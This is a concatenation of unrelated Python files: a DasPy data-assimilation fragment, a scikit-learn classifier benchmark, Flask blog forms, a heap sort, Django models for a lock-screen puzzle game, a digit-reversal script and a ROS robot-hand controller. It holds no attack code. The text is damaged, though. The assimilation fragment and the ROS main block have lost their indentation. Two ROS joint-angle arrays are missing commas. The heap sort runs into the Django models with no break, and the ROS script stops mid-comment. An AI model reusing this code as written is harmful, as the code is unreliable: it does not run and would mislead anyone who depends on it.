print "Ens_Index",Ens_Index,"Parameter_PFT_Space_Ensemble_Copy:",Parameter_PFT_Space_Ensemble_Copy[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Parameter_PFT_Space_Ensemble:",Parameter_PFT_Space_Ensemble[Ens_Index, Par_Index, Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del SysModel_Mat_Ens,ObsModel_Mat_Ens
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans,Parameter_PFT_Space_Ensemble_Copy,Parameter_PFT_Space_Ensemble,Analysis_Grid_Array
Par_Index_Sub += 1
#os.abort()
for Dim_PFT_Par_Index in range(Dim_PFT_Par):
#print numpy.shape(Parameter_PFT_Space_Ensemble_Obs_Dim[:,Dim_PFT_Par_Index,:,:]),numpy.shape(Parameter_PFT_Space_Ensemble_Temp_Copy[:,Dim_PFT_Par_Index,:,:])
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,Dim_PFT_Par_Index,:,:] += NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,Dim_PFT_Par_Index,:,:]
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Initial_Copy.close()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.close()
NC_File_Out_Assimilation_2_Parameter_Copy.close()
print "Soil_Par_Accum_Dim",Soil_Par_Accum_Dim,"Veg_Par_Accum_Dim",Veg_Par_Accum_Dim,"PFT_Par_Accum_Dim",PFT_Par_Accum_Dim
print ""
print "Optimized_Parameter_Index",Optimized_Parameter_Index
numexpr_a = []
numexpr_b = []
numexpr_c = []
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Parameter_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Copy, 'r')
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r+')
NC_File_Out_Assimilation_2_Parameter_Obs_Dim = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter_Obs_Dim, 'r+')
if Soil_Par_Accum_Dim > 0:
Parameter_Soil_Space_Ensemble_Obs_Dim = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,:,:,:]
for Dim_Soil_Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens_Array[0][Dim_Soil_Par_Index] or Soil_Par_Sens_Array[1][Dim_Soil_Par_Index]:
#print numpy.shape(Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:]),numpy.shape(Parameter_Soil_Space_Ensemble_Temp_Copy[:,Dim_Soil_Par_Index,:,:])
Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:] = Parameter_Soil_Space_Ensemble_Obs_Dim[:,Dim_Soil_Par_Index,:,:] / float(Soil_Par_Accum_Dim)
if Parameter_Optimization == 1:
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][:,Dim_Soil_Par_Index,:,:] = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][:,Dim_Soil_Par_Index,:,:] / float(Soil_Par_Accum_Dim)
else:
for Ens_Index in range(Ensemble_Number):
Parameter_Soil_Space_Ensemble_Obs_Dim[Ens_Index,Dim_Soil_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_Soil_Space_Single'][Dim_Soil_Par_Index,:,:]
if Parameter_Optimization == 1:
for Ens_Index in range(Ensemble_Number_Predict):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_Soil_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_Soil_Space_Single'][Dim_Soil_Par_Index,:,:]
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,:,:,:] = Parameter_Soil_Space_Ensemble_Obs_Dim
del Parameter_Soil_Space_Ensemble_Obs_Dim
if PFT_Par_Accum_Dim > 0:
Parameter_PFT_Space_Ensemble_Obs_Dim = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,:,:,:]
for Dim_PFT_Par_Index in range(Dim_PFT_Par):
if numpy.size(numpy.where(numpy.asarray(PFT_Par_Sens_Array)[:,Dim_PFT_Par_Index] == True)) >= 1:
Parameter_PFT_Space_Ensemble_Obs_Dim[:,Dim_PFT_Par_Index,:,:] = Parameter_PFT_Space_Ensemble_Obs_Dim[:,Dim_PFT_Par_Index,:,:] / float(PFT_Par_Accum_Dim)
if Parameter_Optimization == 1:
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_PFT_Par_Index,:,:] = NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_PFT_Par_Index,:,:] / float(PFT_Par_Accum_Dim)
else:
for Ens_Index in range(Ensemble_Number):
Parameter_PFT_Space_Ensemble_Obs_Dim[Ens_Index,Dim_PFT_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_PFT_Space_Single'][Dim_PFT_Par_Index,:,:]
if Parameter_Optimization == 1:
for Ens_Index in range(Ensemble_Number_Predict):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][Ens_Index,Dim_PFT_Par_Index,:,:] = NC_File_Parameter_Space_Single.variables['Parameter_PFT_Space_Single'][Dim_PFT_Par_Index,:,:]
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,:,:,:] = Parameter_PFT_Space_Ensemble_Obs_Dim
del Parameter_PFT_Space_Ensemble_Obs_Dim
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Veg_Space_Ensemble_Obs_Dim'][:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Hard_Space_Ensemble_Obs_Dim'][:,:,:,:] = 0.0
if (numpy.size(numpy.where(numpy.asarray(Veg_Par_Sens_Array) == True)) >= 1):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Veg_Space_Ensemble_Matrix_Obs_Dim'][:,:,:,:] = 0.0
if (numpy.size(numpy.where(numpy.asarray(PFT_Par_Sens_Array) == True)) >= 1):
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Obs_Dim'][:,:,:,:] = 0.0
if Parameter_Optimization == 1:
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Soil_Space_Ensemble_Predict_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Veg_Space_Ensemble_Predict_Obs_Dim'][:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_PFT_Space_Ensemble_Predict_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.variables['Parameter_Hard_Space_Ensemble_Predict_Obs_Dim'][:,:,:,:] = 0.0
NC_File_Out_Assimilation_2_Parameter.sync()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Parameter_Copy.close()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.sync()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.close()
NC_File_Out_Assimilation_2_Initial.close()
#Parameter_Soil_Space_Single = numpy.mean(Parameter_Soil_Space_Ensemble_Obs_Dim,axis=0)
#Parameter_Veg_Space_Single = numpy.mean(Parameter_Veg_Space_Ensemble_Obs_Dim,axis=0)
NC_File_Parameter_Space_Single.close()
del numexpr_a,numexpr_b,numexpr_c
gc.collect()
del gc.garbage[:]
if PDAF_Assim_Framework == 2: # Restart PP sever after PDAF MPI
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
while len(job_server_node_array) < 1:
job_server_node_array = DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
return Def_Par_Optimized, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, job_server_node_array, active_nodes_server, Optimized_Parameter_Index
|
from Features import Features
from sklearn import svm
from sklearn.naive_bayes import GaussianNB
from sklearn.naive_bayes import BernoulliNB
from sklearn.naive_bayes import MultinomialNB
from sklearn import tree
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix
import logging
import os
import sys
import datetime
class Classifier(object):
    """
    ----------------- OUTDATED -----------------
    Abandoned prototype, no longer kept in sync with the others because its
    results were too low.  It benchmarks a grid of scikit-learn classifiers
    over bag-of-visual-words histograms and logs confusion matrices to
    data.log.
    """

    @staticmethod
    def _build_classifier(algo):
        """Instantiate the scikit-learn model described by (family, param)."""
        family, param = algo
        if family == "svm":
            # "svc" selects the linear SVC variant; otherwise param is a kernel name.
            return svm.LinearSVC() if param == "svc" else svm.SVC(kernel=param)
        if family == "bayes":
            if param == "multinomial":
                return MultinomialNB()
            return GaussianNB() if param == "gaussian" else BernoulliNB()
        if family == "dtree":
            if param == "gini":
                return tree.DecisionTreeClassifier()
            return tree.DecisionTreeClassifier(criterion="entropy")
        if family == "knn":
            # param is the number of neighbours.
            return KNeighborsClassifier(param)
        if family == "rforest":
            # param is the number of trees.
            return RandomForestClassifier(param)

    @staticmethod
    def _generate_all(train_dir, test_dir, k_values, data_standardization):
        """Generate and save train/test feature data for every vocabulary size."""
        logging.warning("Generating data for train and test ...")
        # Generate data for each logo types (e.g. MasterCard vs Other, Visa vs Other, etc.)
        for k in k_values:
            logging.info("Number of cluster (kmeans): " + str(k))
            start_time = datetime.datetime.now()
            feature = Features()
            feature.generate_data(train_dir, k, data_standardization)
            feature.save_data("train/" + str(k))
            logging.info("Time train: " + str(datetime.datetime.now() - start_time))
            start_time = datetime.datetime.now()
            t_feature = Features()
            # Reuse the training vocabulary and scaler so test histograms
            # live in the same feature space.
            t_feature.generate_data(test_dir, k, data_standardization, False,
                                    feature.vocabulary, feature.std_slr)
            t_feature.save_data("test/" + str(k))
            logging.info("Time test: " + str(datetime.datetime.now() - start_time))
        logging.warning("Generation ended.")

    def __init__(self):
        # ----------------- SETTINGS -----------------
        generate_data = True
        data_standardization = True
        # ----------------- ALGORITHMS -----------------
        # (family, hyper-parameter) pairs to benchmark.
        tests = [("svm", "linear"), ("svm", "poly"), ("svm", "rbf"), ("svm", "sigmoid"), ("svm", "svc"),
                 ("bayes", "gaussian"), ("bayes", "bernoulli"), ("knn", 11), ("knn", 53),
                 ("knn", 101), ("dtree", "gini"), ("dtree", "entropy"), ("rforest", 10), ("rforest", 100),
                 ("rforest", 1000), ("rforest", 10000)]
        # ("bayes", "multinomial") cannot have negative values
        # To use it train the data with data_standardization = False
        k_values = [100, 500, 1000, 10000]
        # Images directories
        # ----------------- CHANGE TRAIN AND TEST DIRECTORY -----------------
        train_dir = os.path.abspath("C:/git/Logos-Recognition-for-Webshop-Services/logorec/resources/images/train")
        test_dir = os.path.abspath("C:/git/Logos-Recognition-for-Webshop-Services/logorec/resources/images/test")
        # Start logging
        logging.basicConfig(filename='data.log', filemode='w', level=logging.INFO)
        if generate_data:
            self._generate_all(train_dir, test_dir, k_values, data_standardization)
        feature = Features()
        logging.warning("Start test ...")
        for algo in tests:
            for k in k_values:
                # Time initialisation
                start_time = datetime.datetime.now()
                # Load the train data for this vocabulary size.
                feature.load_data("train/" + str(k))
                # Build, train and evaluate the classifier.
                classifier = self._build_classifier(algo)
                classifier.fit(feature.histograms, feature.main_images_class)
                feature.load_data("test/" + str(k))
                solutions = classifier.predict(feature.histograms)
                confusion = confusion_matrix(feature.main_images_class, solutions)
                # Print information
                logging.info("Algorithm: " + str(algo[0]) + ": " + str(algo[1]))
                logging.info("Number of cluster (kmeans): " + str(k))
                logging.info("Time: " + str(datetime.datetime.now() - start_time))
                logging.info("Confusion: ")
                logging.info(confusion)
def main():
    """Entry point: run the (outdated) classifier benchmark."""
    Classifier()


if __name__ == "__main__":
    main()
|
# -*-coding:utf-8-*-
# Forms module: blog posts, user profiles, and comments.
from flask_pagedown.fields import PageDownField
from flask_wtf import Form
from wtforms import StringField, SubmitField, TextAreaField, BooleanField, SelectField
from wtforms.validators import Required, Length, Email, Regexp, ValidationError

from ..models import Role, User
class PostForm(Form):
    """Form for publishing a new post (Markdown-enabled body)."""

    body = PageDownField('写下你想说的', validators=[Required()])
    submit = SubmitField('发表文章')
# Profile-editing form for ordinary users
class EditProfileForm(Form):
    """Profile-editing form for ordinary users.

    Usernames may not start with a digit (enforced by the Regexp validator).
    """

    username = StringField('新昵称', validators=[Length(0, 64), Regexp('^[^0-9].*$', 0, '第一个字符不能是数字,那样太丑!')])
    name = StringField('真实姓名', validators=[Length(0, 64)])
    location = StringField('坐标', validators=[Length(0, 64)])
    about_me = TextAreaField('我的信息')
    submit = SubmitField('提交')
# Profile-editing form for administrators
class EditProfileAdminForm(Form):
    """Profile-editing form for administrators.

    Unlike the ordinary-user form, administrators may also change a user's
    email address, username, confirmation state and role.
    """

    email = StringField('邮箱地址', validators=[Required(), Length(1, 64), Email()])
    username = StringField('昵称', validators=[Required(), Length(1, 64), Regexp('^[^0-9].*$', 0, '第一个字符不能是数字,那样太丑!')])
    confirmed = BooleanField('确认')
    role = SelectField('角色', coerce=int)
    name = StringField('真实姓名', validators=[Length(0, 64)])
    location = StringField('坐标', validators=[Length(0, 64)])
    about_me = TextAreaField('我的信息')
    submit = SubmitField('提交')

    def __init__(self, user, *args, **kwargs):
        super(EditProfileAdminForm, self).__init__(*args, **kwargs)
        # Populate the SelectField: (id, name) per role — id is the stored
        # value, name the displayed label.
        self.role.choices = [(role.id, role.name) for role in Role.query.order_by(Role.name).all()]
        # Remember the user being edited so the validators below can tell
        # "unchanged" apart from "already taken by someone else".
        self.user = user

    # Only reject a duplicate email/username when the field actually changed;
    # otherwise saving your own unchanged profile would always fail.
    # NOTE: the original raised ValidationError without importing it
    # (a NameError at runtime); it is now imported from wtforms.validators.
    def validate_email(self, field):
        if field.data != self.user.email and User.query.filter_by(email=field.data).first():
            raise ValidationError('邮箱已经注册.')

    def validate_username(self, field):
        if field.data != self.user.username and User.query.filter_by(username=field.data).first():
            raise ValidationError('用户名已经注册.')
# Comment-submission form
class CommentForm(Form):
    """Comment-submission form: a single required text field."""

    body = StringField('', validators=[Required()])
    submit = SubmitField('提交')
|
import time
class HeapSort:
    """In-place heap sort with an optional per-step delay.

    Both routines are plain algorithms that touch no instance state, so they
    are static methods.  The original declared them without ``self`` and then
    called ``self.heapify`` inside ``heap_sort`` (where no ``self`` existed)
    and a bare ``heapify`` recursively — both raised NameError at runtime.
    """

    @staticmethod
    def heapify(arr, n, i):
        """Sift arr[i] down so the subtree rooted at i is a max-heap.

        ``n`` is the size of the heap prefix of ``arr`` under consideration.
        """
        largest = i
        l = 2 * i + 1  # left child
        r = 2 * i + 2  # right child
        if l < n and arr[i] < arr[l]:
            largest = l
        if r < n and arr[largest] < arr[r]:
            largest = r
        if largest != i:
            arr[i], arr[largest] = arr[largest], arr[i]
            # Continue sifting down the subtree we swapped into.
            HeapSort.heapify(arr, n, largest)

    @staticmethod
    def heap_sort(vetor, tempo):
        """Sort ``vetor.lista`` in place, sleeping ``tempo`` seconds per step.

        ``vetor`` must expose ``lista`` (the list to sort) and an ``ordenado``
        flag, cleared while sorting and set when done.  The per-step delay
        presumably lets a visualisation follow the progress — hence it is kept.
        Returns the sorted list.
        """
        vetor.ordenado = False
        n = len(vetor.lista)
        # Build the max-heap.  Starting at n (instead of the conventional
        # n // 2 - 1) only adds no-op calls on out-of-range/leaf indices;
        # kept to preserve the original step/delay count.
        for i in range(n, -1, -1):
            HeapSort.heapify(vetor.lista, n, i)
            time.sleep(tempo)
        # Repeatedly move the max to the end and re-heapify the prefix.
        for i in range(n - 1, 0, -1):
            vetor.lista[i], vetor.lista[0] = vetor.lista[0], vetor.lista[i]
            HeapSort.heapify(vetor.lista, i, 0)
            time.sleep(tempo)
        vetor.ordenado = True
        return vetor.lista
from django.db import models
from django.contrib.auth.models import User
type_choices = (('0', 'PIN'),
('1', 'PASSWORD'))
class UserProfile(models.Model):
    # Extends the built-in auth User with a per-user coin balance.
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name="user_profile")
    coins = models.IntegerField(default=0)  # spendable currency, starts at zero
class PackageUserRelation(models.Model):
    # Join table linking a user profile to a level package (string reference
    # because LevelPackage is declared later in this module).
    # NOTE(review): presumably records package ownership/unlocks — a plain
    # ManyToManyField would also work unless extra fields are planned; confirm.
    user_profile = models.ForeignKey(UserProfile, related_name="pur", on_delete=models.CASCADE)
    package = models.ForeignKey("LevelPackage", on_delete=models.CASCADE, related_name="pur")
class Level(models.Model):
    # A single playable level.  Almost every attribute is a nullable
    # CharField — even times, dates and counts are stored as strings;
    # NOTE(review): presumably the client consumes them as raw text, so
    # confirm before tightening any of these types.

    # -- Lock-screen display data --
    name = models.CharField(max_length=255, blank=True, null=True)
    time = models.CharField(max_length=255, blank=True, null=True)
    date = models.CharField(max_length=255, blank=True, null=True)
    singer = models.CharField(max_length=255, blank=True, null=True)
    song_name = models.CharField(max_length=255, blank=True, null=True)
    msg_count = models.CharField(max_length=255, blank=True, null=True)
    code = models.CharField(max_length=255, blank=True, null=True)
    # -- Notification content --
    notif_sender = models.CharField(max_length=255, blank=True, null=True)
    notif_msg = models.CharField(max_length=255, blank=True, null=True)
    default_phone_number = models.CharField(max_length=255, blank=True, null=True)
    hint_msg = models.CharField(max_length=255, blank=True, null=True)
    # -- Incoming-call event data --
    incoming_call_number = models.CharField(max_length=255, blank=True, null=True)
    incoming_call_name = models.CharField(max_length=255, blank=True, null=True)
    clipboard_msg = models.CharField(max_length=255, blank=True, null=True)
    # -- Second notification --
    second_name = models.CharField(max_length=255, blank=True, null=True)
    second_text = models.CharField(max_length=255, blank=True, null=True)
    # -- Hints (plus Farsi variants) --
    hint_1 = models.CharField(max_length=255, blank=True, null=True)
    hint_2 = models.CharField(max_length=255, blank=True, null=True)
    hint1farsi = models.CharField(max_length=255, blank=True, null=True)
    hint2farsi = models.CharField(max_length=255, blank=True, null=True)
    # Unlock mechanism: '0' = PIN, '1' = PASSWORD (see type_choices above).
    # The field name shadows the builtin `type` but renaming would change the
    # DB column.
    type = models.CharField(max_length=1, choices=type_choices, default='0')
    # -- Artwork --
    image = models.ImageField(max_length=255, blank=True, null=True)
    cover = models.ImageField(max_length=255, blank=True, null=True)
    incoming_call_image = models.ImageField(max_length=255, blank=True, null=True)
    # -- Numeric settings --
    hint_count = models.IntegerField(blank=True, null=True, default=0)
    pin_count = models.IntegerField(blank=True, null=True, default=4)  # NOTE(review): presumably PIN length — confirm
    index = models.IntegerField(blank=True, null=True, default=4)
    # -- Feature toggles for the level's scripted events --
    notif = models.BooleanField(default=False)
    hint = models.BooleanField(default=False)
    passed = models.BooleanField(default=False)
    incoming_call = models.BooleanField(default=False)
    clipboard = models.BooleanField(default=False)
    second_notif = models.BooleanField(default=False)
    # -- Contact card data --
    contact_name = models.CharField(max_length=255, null=True, blank=True)
    contact_number = models.CharField(max_length=255, null=True, blank=True)

    def __str__(self):
        # str() keeps this safe when name is NULL (returns "None").
        return str(self.name)
class LevelPackage(models.Model):
    # A purchasable bundle of levels.
    name = models.CharField(max_length=255)
    price = models.IntegerField()  # NOTE(review): presumably priced in UserProfile.coins — confirm
    image = models.ImageField(max_length=255, blank=True, null=True)
    levels = models.ManyToManyField(Level, related_name="pack")
|
def reverse_digits(number):
    """Return the decimal digits of a non-negative integer in reverse order.

    Examples: 123 -> 321, 1200 -> 21 (leading zeros vanish), 0 -> 0.
    For number <= 0 the loop never runs and 0 is returned, matching the
    original flat script's behavior.
    """
    reversed_value = 0
    while number > 0:
        number, remainder = divmod(number, 10)
        reversed_value = reversed_value * 10 + remainder
    return reversed_value


if __name__ == "__main__":
    # Read one integer from stdin and print its digit-reversed value,
    # exactly as the original unguarded script did.
    print(reverse_digits(int(input())))
|
#!/usr/bin/env python3
#
# finger_counting.py
#
#
# Parameters: /robot_description URDF
#
import rospy
import numpy as np
from numpy.linalg import inv
from hw6code.kinematics import Kinematics #Check if this library actually exists or if you need to make a setup.py for it
from sensor_msgs.msg import JointState
#
# Joint States Publisher
#
# Isolate the ROS message publisher to keep the main code simpler.
#
class JointStatePublisher:
    """Isolates the /joint_states ROS publisher so the main code stays simple."""

    def __init__(self, names):
        # Degrees of freedom = number of joint names.
        self.n = len(names)
        # Publisher for the joint values.
        self.pub = rospy.Publisher("/joint_states", JointState, queue_size=100)
        # Give subscribers a moment to connect; messages published before the
        # connection is up would otherwise be lost.
        rospy.sleep(0.25)
        # Pre-build one message and reuse it on every send(): each joint is
        # named explicitly and its position initialized to zero.
        self.msg = JointState()
        for joint_name in names:
            self.msg.name.append(joint_name)
            self.msg.position.append(0.0)
        # Report.
        rospy.loginfo("Ready to publish /joint_states with %d DOFs", self.n)

    def dofs(self):
        """Return the number of DOFs this publisher was configured with."""
        return self.n

    def send(self, q):
        """Publish joint positions q (indexable, length self.n), stamped now."""
        self.msg.position[:] = [q[i] for i in range(self.n)]
        self.msg.header.stamp = rospy.Time.now()
        self.pub.publish(self.msg)
#
# Basic Rotation Matrices
#
def Rx(theta):
    """Rotation about the x-axis by theta radians (3x3 matrix)."""
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[1.0, 0.0, 0.0],
                     [0.0, c, -s],
                     [0.0, s, c]])
def Ry(theta):
    """Rotation about the y-axis by theta radians (3x3 matrix)."""
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[c, 0.0, s],
                     [0.0, 1.0, 0.0],
                     [-s, 0.0, c]])
def Rz(theta):
    """Rotation about the z-axis by theta radians (3x3 matrix)."""
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[c, -s, 0.0],
                     [s, c, 0.0],
                     [0.0, 0.0, 1.0]])
#
# Simple Vector
#
# Just collect a 3x1 column vector
#
def vec(x, y, z):
    """Collect x, y, z into a 3x1 column vector."""
    return np.array([x, y, z]).reshape(3, 1)
# 6x1 Error Computation
#
# Note the 3x1 translation is on TOP of the 3x1 rotation error!
#
# Also note, the cross product does not return a column vector but
# just a one dimensional array. So we need to convert into a 2
# dimensional matrix, and transpose into the column form. And then
# we use vstack to stack vertically...
#
def etip(p, pd, R, Rd):
    """Position error between the tip pose (p, R) and desired pose (pd, Rd).

    Only the 3x1 translation error pd - p is returned for now.  The 3x1
    orientation error is still computed (as in the original) so it can be
    re-enabled by stacking it under the translation error — see the
    commented-out return.
    """
    ep = pd - p
    # Orientation error: half the sum of cross products of matching columns.
    # np.cross yields a 1-D array, so it is promoted to 2-D and transposed
    # into column form.
    eR1 = 0.5 * sum(np.cross(R[:, k], Rd[:, k]) for k in range(3))
    eR = np.matrix.transpose(np.atleast_2d(eR1))
    # return np.vstack((ep, eR))  # re-enable when tracking orientation too
    return ep
# Cubic Function Coefficient Calculator
#
# Takes in position and velocity values p0 and v0 at time t0
# and position and velocity values pf and vf at time tf and
# returns the four coefficients for the function.
def cubic_coeff(dt, p0, pf, v0, vf):
    """Return the coefficients [a0, a1, a2, a3] (as a 4x1 array) of the cubic
    p(t) = a0 + a1*t + a2*t**2 + a3*t**3 satisfying the boundary conditions

        p(0)  = p0,   p'(0)  = v0,
        p(dt) = pf,   p'(dt) = vf.

    Fixes two bugs in the original: the right-hand side was ordered
    [p0, pf, v0, vf] against rows ordered [p(0), p'(0), p(dt), p'(dt)],
    and the last entry of the p'(dt) row was 2*dt**2 instead of 3*dt**2
    (the derivative of a3*t**3 is 3*a3*t**2).
    """
    Y = np.array([[1, 0,  0,       0        ],   # p(0)
                  [0, 1,  0,       0        ],   # p'(0)
                  [1, dt, dt**2,   dt**3    ],   # p(dt)
                  [0, 1,  2 * dt,  3 * dt**2]])  # p'(dt)
    # Solve Y @ coeff = [p0, v0, pf, vf]; solve() is preferable to forming
    # an explicit inverse.
    return np.linalg.solve(Y, np.array([[p0], [v0], [pf], [vf]]))
def desired_path(t, dt, p0, pgoal):
    """Rest-to-rest cubic trajectory from p0 to pgoal over duration dt.

    Returns (pd, vd): the desired position and velocity at time t, each
    produced by applying the time-basis row vector to the stacked per-axis
    cubic coefficients.
    """
    # One cubic per axis, starting and ending with zero velocity.
    coeff_stack = np.array([cubic_coeff(dt, p0[axis], pgoal[axis], 0, 0)
                            for axis in range(3)])
    position_basis = np.array([1, t, t**2, t**3])
    velocity_basis = np.array([0, 1, 2 * t, 3 * t**2])
    return (position_basis @ coeff_stack, velocity_basis @ coeff_stack)
#
# Main Code
#
if __name__ == "__main__":
# LOGISTICAL SETUP
#
# Prepare the node.
rospy.init_node('finger_counting')
rospy.loginfo("Starting the code for finger counting...")
# Prepare a servo loop at 100Hz.
rate = 100;
servo = rospy.Rate(rate)
dt = servo.sleep_dur.to_sec()
rospy.loginfo("Running with a loop dt of %f seconds (%fHz)" %
(dt, rate))
# Set up the kinematics, from world to tip.
urdf = rospy.get_param('/robot_description')
kin_thumb = Kinematics(urdf, 'base_link', 'thumb_3')
N_thumb = kin_thumb.dofs()
kin_index = Kinematics(urdf, 'base_link', 'index_3')
N_index = kin_index.dofs()
kin_middle = Kinematics(urdf, 'base_link', 'middle_3')
N_middle = kin_middle.dofs()
kin_ring = Kinematics(urdf, 'base_link', 'ring_3')
N_ring = kin_ring.dofs()
kin_pinky = Kinematics(urdf, 'base_link', 'pinky_3')
N_pinky = kin_pinky.dofs()
# Allocate the memory for the numpy variables for tip position,
# tip orientation, and Jacobian. The kinematics code changes the
# data in place, so these need to be allocated! But the content
# will be overwritten so the initial values are irrelevant.
p_thumb = np.zeros((3,1))
R_thumb = np.identity(3)
J_thumb = np.zeros((6,N_thumb))
p_index = np.zeros((3,1))
R_index = np.identity(3)
J_index = np.zeros((6,N_index))
p_middle = np.zeros((3,1))
R_middle = np.identity(3)
J_middle = np.zeros((6,N_middle))
p_ring = np.zeros((3,1))
R_ring = np.identity(3)
J_ring = np.zeros((6,N_ring))
p_pinky = np.zeros((3,1))
R_pinky = np.identity(3)
J_pinky = np.zeros((6,N_pinky))
# Set up the publisher, naming the joints!
pub = JointStatePublisher(('thumb_palm', 'thumb_palm_updown', 'thumb_12', 'thumb_23',
'index_palm', 'index_12', 'index_23',
'middle_palm', 'middle_12', 'middle_23',
'rp_palm', 'ring_rp', 'ring_12', 'ring_23',
'pinky_rp', 'pinky_12', 'pinky_23'))
# Make sure the URDF and publisher agree in dimensions.
if not pub.dofs() == N_thumb + N_index + N_ring + N_pinky - 1:
rospy.logerr("FIX Publisher to agree with URDF!")
# Set the numpy printing options (as not to be overly confusing).
# This is entirely to make it look pretty (in my opinion).
np.set_printoptions(suppress = True, precision = 6)
# Close finger positions
# Used fkin to establish the closed positions to calculate errors/know where you are aiming for in the task space
theta_ti = np.array([[1.51], [0], [0.11], [0.18],
[0], [0.87], [1.42],
[0], [0], [0],
[0], [0], [0], [0],
[0], [0], [0]])
theta_tm = np.array([[1.12], [-0.38], [0.27], [0.31]
[0], [0], [0],
[0], [1.31], [1.16],
[0], [0], [0], [0],
[0], [0], [0]])
theta_tr = np.array([[1.19], [-0.91], [0.20], [0.30]
[0], [0], [0],
[0], [0], [0],
[0], [0.42], [1.33], [1.09],
[0], [0], [0]])
theta_tp = np.array([[1.41], [-1.07], [0.14], [0.13],
[0], [0], [0],
[0], [0], [0],
[0], [0], [0], [0],
[0.69], [1.17], [1.03]])
theta_start = np.zeros(pub.dofs(), 1)
# Find all the positions for an open hand
#
# Pseudo Code for testing
#
while not rospy.is_shutdown():
    # Per-finger joint angles sliced out of the stacked theta column vector.
    # TODO(review): the bounds skip indices 3, 6 and 9 and the row counts do
